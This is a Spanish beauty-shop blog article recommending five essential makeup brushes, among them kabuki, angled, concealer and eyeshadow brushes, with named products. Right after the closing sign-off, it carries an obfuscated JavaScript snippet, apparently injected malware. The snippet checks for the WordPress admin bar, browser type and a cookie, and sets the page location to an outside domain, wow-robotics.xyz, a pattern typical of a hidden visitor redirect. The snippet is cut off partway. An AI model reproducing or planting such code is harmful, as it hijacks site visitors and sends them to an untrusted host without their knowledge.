Una pregunta que muchas nos hacéis tanto en tienda como por las redes sociales tiene que ver con el uso de las brochas de maquillaje. Es verdad que existen tantas brochas como cubiertos en un banquete importante ¡con lo fácil que sería utilizar solo uno! Pero luego te das cuenta de que cada cual cumple una función única. Por eso, en este artículo os ofreceremos un manual básico sobre las brochas de maquillaje más importantes y cómo utilizarlas. Aunque sabemos que los y las profesionales utilizan muchísimas más, nuestra idea es mostraros solo las 5 que nunca deben faltar en nuestra rutina de maquillaje diaria. ¡Comenzamos!

set de brochas de maquillaje dentro de un neceser negro y unas manos que sacan una de ellas

Brochas redondeadas, las más básicas y fáciles de utilizar.

Antes de comenzar, nos gustaría aclarar que para el maquillaje líquido son muchas las que prefieren la esponja, por eso si queréis aprender a utilizarla de forma correcta os recomendamos el vídeo Errores más comunes de maquillaje de Lucía Puebla, maquilladora profesional. Volviendo a las brochas redondeadas, nosotras os queremos recomendar la que se conoce con el nombre de Kabuki y cuyas principales características son:

  • Para maquillaje fluido, cushion, crema y en polvo ¡perfecta para los bronceadores!
  • Gran precisión y comodidad de uso.
  • Después del maquillaje base, son muy útiles para sellarlo con polvos.
  • Su densidad y forma consiguen un acabado más pulido y natural.

La dual Daiya Fude de Shiseido nos gusta especialmente por su tacto suave y la flexibilidad de sus cerdas. Su diseño ergonómico consigue que aplicar el maquillaje nos resulte fácil e instintivo, además, no se desperdicia producto y es muy fácil de limpiar.

brocha de maquillaje corta y con el pincel muy grueso la base es negra y el pincel rosa fucsia

Brochas corte diagonal o biseladas, imprescindibles para realzar.

 El segundo básico que siempre debemos tener a mano son las brochas con corte en diagonal. Su forma tan particular responde a la necesidad de cubrir las zonas menos lisas de nuestro rostro como, por ejemplo, los pómulos. A nosotras nos gusta la resistencia y el acabado tan profesional que conseguimos con la PINCEAU TEINT 2 EN 1 FLUIDE ET POUDRE de CHANEL. Este tipo de brocha se caracteriza por:

  • La precisión en el trazo y su función de difuminador.
  • Garantizar el control sobre las zonas con más relieve de nuestro rostro como los pómulos o el arco superior de los ojos.
  • Ser perfecta para aplicar el colorete y para la técnica del contouring.

brocha de maquillaje con base negra y larga y cepillo color marron recortado en diagonal para utilizar con el colorete

Pincel corrector, el imprescindible que nunca falla.

Es la mejor herramienta para disimular las imperfecciones que, aunque todos compartimos, no son muy agradables de lucir como las ojeras, las manchas de la piel o los temibles granitos. Su punta plana y compacta es ideal para aplicar el maquillaje corrector ya sea en crema, barra o stick. Si buscáis un pincel que consiga una verdadera fusión con la piel y, en definitva, haga bien su trabajo os presentamos el Pincel Pelo Sintético de Beter que, además, es muy duradero y fácil de limpiar. A la hora de utilizarlo recordar aplicar una mínima cantidad y extender de lado a lado hasta unificar con la piel.

pincel corrector de imperfecciones faciales con palo negro y pincel color marron muy fino

Pincel para sombra en punta y plano, dos básicos para una mirada impactante. 

Si nos gusta utilizar sombras ya sea como complemento a nuestro look diario o solo en ocasiones especiales, será muy necesario utilizar herramientas diseñadas adrede para la zona del ojo que deseamos potenciar. Sus formas deben permitir la aplicación del producto sin complicaciones ni movimientos demasiado técnicos. A nosotras, por ejemplo, nos funciona muy bien el Pincel Sombreador Precisión de Beter que con su forma en punta mejora la precisión y el difuminado para conseguir un resultado final de lo más profesional.

Por otro lado, para intensificar el look en la zona de los ojos necesitamos un pincel delineador de ojos con forma plana y recta. Solo así conseguiremos el efecto difuminado que estamos buscando. ¿Una recomendación fiable? El Pinceau Traceur Paupieres de Sisley porque ha sido creado en colaboración con Raphël, un profesional francés experto en pinceles que nos lleva enamorando desde que probamos la primera vez ¡os pasará lo mismo!

dos brochas con palo negro y pincel color marron una tiene el pincel en punta y el otro es cuadrado y plano sirven las dos para las sombras en los ojos

Estas son, como ya dijimos al principio del artículo, las brochas esenciales para empezar a hacernos un buen estuche de maquillaje y que nos ayudarán a lograr mejores resultados en nuestros looks del día a día. Además, os prometemos que, si queréis saber más sobre brochas y nos lo pedís, haremos un nuevo artículo con modelos más específicos que solo los expertos y las expertas utilizan. ¡Hasta la próxima! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone